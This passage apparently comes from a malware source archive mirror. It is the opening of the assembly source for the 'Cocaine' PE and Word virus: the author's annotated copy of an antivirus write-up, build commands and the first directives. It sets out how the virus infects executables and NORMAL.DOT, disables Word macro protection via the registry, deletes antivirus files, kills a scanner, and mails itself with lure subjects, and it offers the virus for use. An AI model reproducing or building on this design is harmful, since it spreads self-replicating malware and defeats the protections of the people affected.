mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-25 19:45:06 +00:00
5768 lines
192 KiB
NASM
5768 lines
192 KiB
NASM
|
;Wm/W32.Cocaine - 22231 bytes
|
|||
|
;(c) Vecna 1999
|
|||
|
;
|
|||
|
;This virus infect PE and DOC files.
|
|||
|
;
|
|||
|
;Study the code and the AVPVE description for others features.
|
|||
|
;
|
|||
|
;Small corrections in AVPVE text are between []'s
|
|||
|
;
|
|||
|
;
|
|||
|
;
|
|||
|
;AVPVE Description:
|
|||
|
;
|
|||
|
; Cocaine
|
|||
|
;
|
|||
|
; ------------------------------------------------------------------------
|
|||
|
; This is a parasitic Windows PE files and MS Word normal templates infector
|
|||
|
; with email spreading ability, about 22Kb of length. The virus has three
|
|||
|
; instances: in Windows PE EXE files, in Word NORMAL template and as attached
|
|||
|
; file in email messages.
|
|||
|
;
|
|||
|
; The virus code in infected PE EXE files is its main instance. When it is
|
|||
|
; executed, the virus searches for PE EXE files in the current and Windows
|
|||
|
; directories and infects them. The virus also drops infected an NORMAL.DOT
|
|||
|
; to the MS Word directory from its PE EXE instance, as well as sends
|
|||
|
; infected emails. The virus instance in the NORMAL template drops and
|
|||
|
; executes the infected PE EXE file on each document closing, and is not able
|
|||
|
; to infect other documents and templates. [* Wrong. Check the infected doc I
|
|||
|
; included, or the file MACRO.INC for the code *] The virus code in emails
|
|||
|
; appears as attached file that is infected an PE EXE Windows executable file
|
|||
|
; with a random name, or infected NORMAL template.
|
|||
|
;
|
|||
|
; The virus is per-process memory resident. This means that the virus copy
|
|||
|
; may stay in memory for a long time until the infected application
|
|||
|
; terminates. In case only "short-life" applications are infected, the virus
|
|||
|
; code is not present in the system memory for long time. In case an
|
|||
|
; application in permanent use is infected, the virus is active during a long
|
|||
|
; time, hooks Windows functions, infects PE EXE files that are accessed and
|
|||
|
; sends email messages.
|
|||
|
;
|
|||
|
; The virus is polymorphic in PE files as well as in Word NORMAL template.
|
|||
|
; The virus has two polymorphic engines in its EXE code: the first of them
|
|||
|
; generates polymorphic decryption loop in infected PE EXE files, the second
|
|||
|
; one makes the virus macro program in infected NORMAL.DOT polymorphic too.
|
|||
|
;
|
|||
|
; The virus has a payload routine that is executed when an infected file is
|
|||
|
; run after four months when it was infected. [* 8 months... Maybe AAM 12
|
|||
|
; confused AVers ;-) *] This routine displays message boxes that have the
|
|||
|
; header "W32/Wm.Cocaine" and the text that is randomly selected from seven
|
|||
|
; variants:
|
|||
|
;
|
|||
|
; Your life burn faster, obey your master...
|
|||
|
; Chop your breakfast on a mirror...
|
|||
|
; Veins that pump with fear, sucking darkest clear...
|
|||
|
; Taste me you will see, more is all you need...
|
|||
|
; I will occupy, I will help you die...
|
|||
|
; I will run through you, now I rule you too...
|
|||
|
; Master of Puppets, I'm pulling your strings...
|
|||
|
;
|
|||
|
; The virus pays attention to anti-virus programs and tries to disable them.
|
|||
|
; Each time an infected file is executed and virus installs its per-process
|
|||
|
; resident copy it looks for anti-virus data files in the current directory
|
|||
|
; and deletes them. The names of these files look like follows: KERNEL.AVC,
|
|||
|
; SIGN.DEF, FIND.DRV, NOD32.000, DSAVIO32.DLL, SCAN.DAT, VIRSCAN.DAT (AVP,
|
|||
|
; DSAV, NOD, SCAN and other anti-virus data files). The virus also locates
|
|||
|
; and terminates old version of AVP Monitor on-access scanner. [* Not so
|
|||
|
; old ;-) *]
|
|||
|
;
|
|||
|
; The known virus version has bugs and cannot spread from Word macro instance
|
|||
|
; to Windows executable. It also has a bug in PE EXE infection routine and
|
|||
|
; corrupts some WinNT executable files. [* What can I say... is buggy :-) *]
|
|||
|
;
|
|||
|
; The virus has a "copyright" text:
|
|||
|
;
|
|||
|
; (c) Vecna
|
|||
|
;
|
|||
|
; Some virus routines (especially macro ones) are related to the "Fabi"
|
|||
|
; multi-platform virus, and some infected files may be detected by the name
|
|||
|
; of this virus. [* Probably, the loader, before it load the poly virus code,
|
|||
|
; can be detected as Fabi *]
|
|||
|
;
|
|||
|
; Technical details
|
|||
|
;
|
|||
|
; The virus has quite large size for a program written in Assembler - about
|
|||
|
; 22Kb, and has many routines that are quite interesting from a technical
|
|||
|
; point of view.
|
|||
|
;
|
|||
|
; Running infected EXE
|
|||
|
;
|
|||
|
; When an infected file takes control the polymorphic decryption loops are
|
|||
|
; executed. They decrypt the virus code layer-by-layer (the virus is
|
|||
|
; encrypted by several loops - from two till five) and pass control to the
|
|||
|
; virus installation routine. It is necessary to note that several virus
|
|||
|
; blocks stay still encrypted. The virus decrypts and accesses them in case
|
|||
|
; of need, and then encrypts back. These blocks are MS Word infection data
|
|||
|
; and routine as well as PE EXE polymorphic engine.
|
|||
|
;
|
|||
|
; The virus installation routine looks for necessary Windows API functions
|
|||
|
; addresses that are used by the virus later. The list of these functions is
|
|||
|
; quite long, this is caused by list of things the virus does to spread
|
|||
|
; itself. The functions list the virus looks for is below:
|
|||
|
;
|
|||
|
; Exported by Functions list
|
|||
|
; ----------- --------------
|
|||
|
; KERNEL32.DLL: GetProcAddress GetModuleHandleA CreateProcessA
|
|||
|
; CreateFileA WinExec CloseHandle LoadLibraryA FreeLibrary
|
|||
|
; CreateFileMappingA MapViewOfFile UnmapViewOfFile
|
|||
|
; FindFirstFileA FindNextFileA FindClose SetEndOfFile
|
|||
|
; VirtualAlloc VirtualFree GetSystemTime
|
|||
|
; GetWindowsDirectoryA GetSystemDirectoryA
|
|||
|
; GetCurrentDirectoryA SetFileAttributesA SetFileTime
|
|||
|
; ExitProcess GetCurrentProcess WriteProcessMemory WriteFile
|
|||
|
; DeleteFileA Sleep CreateThread GetFileSize SetFilePointer
|
|||
|
; USER32.DLL: MessageBoxA FindWindowA PostMessageA
|
|||
|
; ADVAPI32: RegSetValueExA RegCreateKeyExA RegOpenKeyExA
|
|||
|
; RegQueryValueExA RegCloseKey
|
|||
|
; MAPI32.DLL: MAPISendMail
|
|||
|
;
|
|||
|
; The virus gets these functions' addresses by the standard Windows virus
|
|||
|
; trick: it locates the image on KERNEL32.DLL in the Windows memory, scans
|
|||
|
; its Export table and gets addresses of two functions: GetModuleHandle and
|
|||
|
; GetProcAddress [* The import table is searched while infecting a file for
|
|||
|
; GetModuleHandle *]. By using these two functions the virus is then able
|
|||
|
; easily locate all addresses of other necessary functions. The most
|
|||
|
; interesting feature of this routine is: this is the first virus that processes
|
|||
|
; not only Win95/98 and WinNT addresses while looking for KERNEL32.DLL image,
|
|||
|
; but pays attention for Win2000 addresses also [* If the host dont import
|
|||
|
; GetModuleHandle this is *]
|
|||
|
;
|
|||
|
; The virus then locates and infects the MS Word, then searches for PE EXE
|
|||
|
; files and also infects them, then hooks a set of system events (files and
|
|||
|
; emails access) that is used to locate and infect more files as well as
|
|||
|
; spread virus copy to the Internet in attached emails.
|
|||
|
;
|
|||
|
; Infecting MS Word
|
|||
|
;
|
|||
|
; The very first infection routine that is activated by the virus is its MS
|
|||
|
; Word affecting routine, if it is installed in the system. First of all here
|
|||
|
; the virus checks for C:\ANCEV.SYS file presence.
|
|||
|
;
|
|||
|
; The C:\ANCEV.SYS file ("ANCEV"="VECNA" written backward) has a special
|
|||
|
; purpose. This file is created when the MS Word template infection routine
|
|||
|
; completes. So, this file presence means that MS Word was located and
|
|||
|
; NORMAL.DOT template was infected. In this case the virus while sending
|
|||
|
; emails sends NORMAL.DOT template but not the infected EXE dropper [* I used
|
|||
|
; to think that DOC files are less suspicious to send by email, but, after
|
|||
|
; melissa's shits, EXE are better i gues *]
|
|||
|
;
|
|||
|
; So, the virus checks for this file at the very top of MS Word infection
|
|||
|
; routine. If it does not exist, the virus continues infection. If this file
|
|||
|
; is found, the virus randomly in one cases of ten continues infection, and
|
|||
|
; in nine cases of ten leaves infection routine. This means that in one case
|
|||
|
; of ten the MS Word NORMAL.DOT will be re-infected anyway [* This is done to
|
|||
|
; avoid lamers creating a fake ANCEV.SYS to not have WinWord infected *].
|
|||
|
;
|
|||
|
; The virus then disables the Word VirusWarning protection by modifying the
|
|||
|
; system registry keys where Word stores its settings:
|
|||
|
;
|
|||
|
; SOFTWARE\Microsoft\Office\8.0\Word\Options, EnableMacroVirusProtection
|
|||
|
;
|
|||
|
; The virus then gets Word's templates directory also by reading system
|
|||
|
; registry:
|
|||
|
;
|
|||
|
; SOFTWARE\Microsoft\Office\8.0\Common\FileNew\LocalTemplates
|
|||
|
;
|
|||
|
; and deletes the NORMAL.DOT template in there, and then creates a new
|
|||
|
; NORMAL.DOT template file - infected one. The infected NORMAL.DOT contains a
|
|||
|
; small macro inside. This macro has "AutoExec" Word auto-name - it will be
|
|||
|
; automatically executed on next Word startup and will import the main virus
|
|||
|
; macro from the C:\COCAINE.SYS file.
|
|||
|
;
|
|||
|
; The C:\COCAINE.SYS file is created by the virus just after overwriting the
|
|||
|
; NORMAL.DOT template. This SYS file is a text file that contains VBA
|
|||
|
; program's source code. This source is extracted by the virus from its code,
|
|||
|
; mixed with junk (polymorphic) VBA instructions and appended by infected PE
|
|||
|
; EXE dropper converted to ASCII strings.
|
|||
|
;
|
|||
|
; So, the MS Word infection routine does its work in two steps. First of all
|
|||
|
; the virus replaces the original NORMAL.DOT with a new one that contains the
|
|||
|
; "AutoExec" macro program (loader) that imports complete virus code from the
|
|||
|
; C:\COCAINE.SYS file, and completes by that porting virus code from PE EXE
|
|||
|
; file to MS Word template.
|
|||
|
;
|
|||
|
; From Word to EXE
|
|||
|
;
|
|||
|
; To drop the PE EXE file from its Word template instance the virus uses a
|
|||
|
; standard macro-viruses' trick. It creates two files: the first of them is
|
|||
|
; the C:\COCAINE.SRC file with infected PE EXE file image converted to ASCII
|
|||
|
; form, and second file is a DOS batch with random name. This batch file
|
|||
|
; contains a set of instructions that execute the DOS DEBUG utility that
|
|||
|
; converts ASCII dump back to binary PE EXE form, and executes it [* This is
|
|||
|
; the worst imaginable way to drop a EXE file ever *]
|
|||
|
;
|
|||
|
; So the virus jumps to Windows out of infected Word template.
|
|||
|
;
|
|||
|
; Infecting PE EXE files
|
|||
|
;
|
|||
|
; When MS Word is affected, the virus goes to PE EXE files infection routine.
|
|||
|
; The virus looks for PE EXE files in the current and Windows directories and
|
|||
|
; infects them. The only files infected are those that have .EXE or .SCR
|
|||
|
; filename extensions.
|
|||
|
;
|
|||
|
; The virus then looks for installed browser and mailer and infects them too.
|
|||
|
; The virus locates them by system registry keys in HKEY_LOCAL_MACHINE
|
|||
|
; storage:
|
|||
|
;
|
|||
|
; SOFTWARE\Classes\htmlfile\shell\open\command
|
|||
|
; SOFTWARE\Classes\mailto\shell\open\command
|
|||
|
;
|
|||
|
; The virus needs these files to be infected for activating its Internet
|
|||
|
; infection routines. When these Internet accessing applications are
|
|||
|
; infected, the virus copy is active in the memory for a long time exactly at
|
|||
|
; the moment a user is connected to the Internet. This is necessary to the
|
|||
|
; virus to realize its Internet spreading ability.
|
|||
|
;
|
|||
|
; PE EXE Infection mechanism
|
|||
|
;
|
|||
|
; The virus checks several conditions before infecting the file. 1st: the
|
|||
|
; file length has to be not divisible by 101 (it is virus protection to avoid
|
|||
|
; multiple infection, the already infected PE EXE files have such length).
|
|||
|
; 2nd: when the virus looks for EXE files in the current and Windows
|
|||
|
; directories to infect them, the name of the file cannot contain 'V' letter
|
|||
|
; or digits, here the virus avoids most popular anti-virus scanners and "goat
|
|||
|
; files" infection.
|
|||
|
;
|
|||
|
; If the first section has big enough size (more than 2304 bytes), the virus
|
|||
|
; writes to there several blocks of junk code that passes the control
|
|||
|
; block-by-block to the main virus decryption loops. There are eight blocks
|
|||
|
; written to files when the virus infects them:
|
|||
|
;
|
|||
|
; +------------+
|
|||
|
; | |
|
|||
|
; |PE Header | ---------------+
|
|||
|
; +------------+ |
|
|||
|
; | +-----+<-+| |
|
|||
|
; | |Junk2| || |
|
|||
|
; | +-----+-+|| Entry Point |
|
|||
|
; |+-----+ |||<---------------+
|
|||
|
; ||Junk1| |||
|
|||
|
; |+-----+----+|
|
|||
|
; | | |
|
|||
|
; |+-----+<--+ |
|
|||
|
; ||Junk3| |
|
|||
|
; |+-----+----+|
|
|||
|
; | V|
|
|||
|
; | . . . |
|
|||
|
; | +-----+|
|
|||
|
; |+----|Junk8||
|
|||
|
; || +-----+|
|
|||
|
; |V |
|
|||
|
; |------------|
|
|||
|
; |Virus code |
|
|||
|
; | |
|
|||
|
; +------------+
|
|||
|
;
|
|||
|
; In this case the virus does not modify program's entry point address, but
|
|||
|
; it needs to restore all overwritten blocks of host file before return
|
|||
|
; control to original entry procedure [* CommanderBomber/OneHalf rulez *].
|
|||
|
;
|
|||
|
; If the first section is short, the control goes directly to virus code. In
|
|||
|
; this case the virus modifies program's entry address to get control when
|
|||
|
; infected files are executed.
|
|||
|
;
|
|||
|
; The virus code itself is encrypted by several (from two till five)
|
|||
|
; polymorphic loops. The polymorphic engine in the virus is quite strong, and
|
|||
|
; produces about 2Kb of polymorphic loops [* This poly is kewl *]
|
|||
|
;
|
|||
|
; The virus also patches the Import section to get functions GetProcAddress,
|
|||
|
; GetModuleHandle, CreateProcessA, WinExec and MAPISendMail when infection
|
|||
|
; executable is run.
|
|||
|
;
|
|||
|
; After all the virus writes its encrypted code to the end of last file
|
|||
|
; section, and increases section size by patching PE header.
|
|||
|
;
|
|||
|
; Intercepting Events
|
|||
|
;
|
|||
|
; When the Word and PE EXE direct infection routines are complete, the virus
|
|||
|
; hooks several Windows functions and stays in Windows memory as part of the
|
|||
|
; host program. The virus hooks two file access function WinExec and
|
|||
|
; CreateProcessA, if they are imported by the host program from the
|
|||
|
; KERNEL32.DLL. When these functions get control (a program is executed) the
|
|||
|
; virus gets the program's file name, gets its directory, searches and
|
|||
|
; infects PE EXE files in this directory.
|
|||
|
;
|
|||
|
; Sending Emails
|
|||
|
;
|
|||
|
; The virus per-process resident code also runs email infection thread, hooks
|
|||
|
; MAPISendMail that is exported from MAPI32.DLL, "connect" and "recv" from
|
|||
|
; WSOCK32.DLL and GetProcAddress from KERNEL32.DLL.
|
|||
|
;
|
|||
|
; The first hook is used by the virus to send its copy to the Internet. When
|
|||
|
; the virus intercepts this event it looks for attached data in the message.
|
|||
|
; If there is no attach, the virus appends to the message infected NORMAL.DOT
|
|||
|
; or infected PE EXE file (the latter is created on the disk in the
|
|||
|
; C:\ENIACOC.SYS file).
|
|||
|
;
|
|||
|
; The "GetProcAddress", "connect" and "recv" hooks are used by the virus to
|
|||
|
; realize second method of infected Emails sending. When a message arrives,
|
|||
|
; the virus scans its header for "mailto:" field, gets the address from there
|
|||
|
; and stores it in its own database. [* MAILTO: is a HTML command/instruction
|
|||
|
; used very often. Nice idea :-) *]
|
|||
|
;
|
|||
|
; When taking control the infection thread looks for email address caught by
|
|||
|
; "connect" and "recv" hooks, calculates its CRC and compares with its
|
|||
|
; "already infected addresses" database that is stored in the BRSCBC.DAT file
|
|||
|
; in the Windows system directory. If this address was not used yet, the
|
|||
|
; virus adds it to its BRSCBC.DAT database, creates a message with NORMAL
|
|||
|
; template or infected PE EXE file, and sends it by using MAPISendMail
|
|||
|
; function [* Why BRSCBC? ;-) *]. The subject field for the message is
|
|||
|
; randomly selected from variants:
|
|||
|
;
|
|||
|
; Kewl page!
|
|||
|
; Improvement to your page
|
|||
|
; Your page r0x0r!
|
|||
|
; You must see this...
|
|||
|
; Secret stuff!
|
|||
|
; [* or a empty subject line *]
|
|||
|
;
|
|||
|
; By using the BRSCBC.DAT database the virus avoids duplicate sendings, but
|
|||
|
; on each infected program run the virus depending on its random counter
|
|||
|
; deletes this file, and clears "do-not-send" database by that.
|
|||
|
;
|
|||
|
; The "GetProcAddress" that is also hooked by virus TSR copy is used only to
|
|||
|
; intercept "connect" and "recv" WSOCK32.DLL functions, if an application
|
|||
|
; does not import these routines "by default", but activates them in case of
|
|||
|
; need. To do that the "GetProcAddress" virus' hook intercepts accesses to
|
|||
|
; "connect" and "recv" WSOCK32.DLL functions' addresses. If an application
|
|||
|
; tries to get addresses of these routines to use Internet connections, the
|
|||
|
; virus returns addresses of its own "connect" and "recv" hookers, and so
|
|||
|
; intercepts Internet connection [* Fucking OPERA *]
|
|||
|
|
|||
|
;Thnz to IkX for accepting this contribution
|
|||
|
|
|||
|
;Greetz to Z0MBiE, VirusBuster and Reptile(the first to use macro autoload)
|
|||
|
|
|||
|
;Special greetz goes to Jacky Qwerty:
|
|||
|
;Los virus no serian lo que son hoy si no fuera por vos!
|
|||
|
;THNDV/CAP/Cabanas RULEZ! (THNDV solo para los mas vivos ;> )
|
|||
|
|
|||
|
;Big fuckZ to T2000 and El Gusano Boliviano: lamers and ripperz!!!!
|
|||
|
|
|||
|
;Greetz to all creative coders
|
|||
|
|
|||
|
;Use the pre-compiled virus, but if you're a sort of 37337 d00d... to compile:
|
|||
|
; TASM /M /ML COKE.ASM
|
|||
|
; TLINK32 COKE,,,IMPORT32
|
|||
|
; PEWRSEC COKE.EXE
|
|||
|
;Remember to split the big COKE.ASM in the smaller incz before!
|
|||
|
;(and beware the trap ;> )
|
|||
|
|
|||
|
;contacts: vecna_br@hotmail.com (except questions about compiling)
|
|||
|
|
|||
|
.586p
|
|||
|
.model flat, STDCALL
|
|||
|
locals
|
|||
|
|
|||
|
include host.inc
|
|||
|
|
|||
|
|